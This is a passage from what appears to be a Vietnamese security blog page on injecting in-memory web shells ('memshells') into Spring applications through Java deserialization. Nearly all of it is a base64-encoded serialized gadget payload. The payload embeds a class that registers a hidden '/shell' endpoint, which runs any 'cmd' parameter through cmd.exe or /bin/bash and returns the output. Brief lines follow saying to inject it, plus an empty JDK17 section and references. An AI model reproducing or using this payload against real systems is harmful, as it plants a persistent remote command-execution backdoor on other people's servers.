cmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMb3JnL2V4YW1wbGUvRXhwbG9pdERlc2VyMk1lbUhpZ2hWZXJzaW9uOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwC2AQAQTWV0aG9kUGFyYW1ldGVycwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ+AQADKClWAQAHY29udGV4dAEAN0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dDsBAA5tYXBwaW5nSGFuZGxlcgEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQATZ2V0TWFwcGluZ0Zvck1ldGhvZAEABW1JbmZvAQA/TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm87AQADb2JqAQANU3RhY2tNYXBUYWJsZQcAgwcAjgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAAWEBABJMamF2YS9sYW5nL1N0cmluZzsBAANydW4BAAFwAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAFvAQABdwEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABGFyZzAHALcHALgHAKEHALkHAKAHAKcHALoBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA4TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZzsBAAV2YWx1ZQEABi9zaGVsbAEAClNvdXJjZUZpbGUBACBFeHBsb2l0RGVzZXIyTWVtSGlnaFZlcnNpb24uamF2YQwATQBOBwC7DAC8AL0BAEBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzDAC+AL8HAMAMAMEAwgEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcHAMMMAMQAxQEAJ29yZy9leGFtcGxlL0V4cGxvaXREZXNlcjJNZW1IaWdoVmVyc2lvbgEAD2phdmEvbGFuZy9DbGFzcwwAxgDHDADIAMkBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QMAMoAxwwAywDMAQAQamF2YS9sYW5nL09iamVjdAwAzQDOAQA9b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbwwAzwDQAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwA0QC9DADSANMBAANjbWQHALcMANQA1QwAxgDWAQAEUE9TVAwA1wDYAQAABwC4DADZANoBAAdvcy5uYW1lBwDbDADcANUMAN0A1gEAA3dpbgwA3gDfAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAB2NtZC5leGUBAAIvYwwATQDgAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA4QDiBwDjDADkAOUMAE0A5gEAAlxBDADnAOgMAOkA6gwA6wDWDADsAE4HALkMAO0AXAwA7gBODADvAPABAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQATamF2YS9pby9QcmludFdyaXRlcgEAE2phdmEvaW8vSU9FeGNlcHRpb24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABRnZXRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBADtvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L3N1cHBvcnQvUmVxdWVzdENvbnRleHRVdGlscwEAGWZpbmRXZWJBcHBsaWNhdGlvbkNvbnRleHQBAGAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dDsBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9yZWdpc3Rlck1hcHBpbmcBAEEoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9p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

Tiến hành inject

Kết quả

3. Deser2memshell trong Spring với JDK17

Do bản JDK cao đã strict việc deser nên mình tạm để trống phần này 🙌

4. Refer

Quick Note Spring Memshelldevme4f.github.io

PreviousMemshell in Spring NextJava Agent Memshell - Demo inject memshell in Jira

Last updated 12 months ago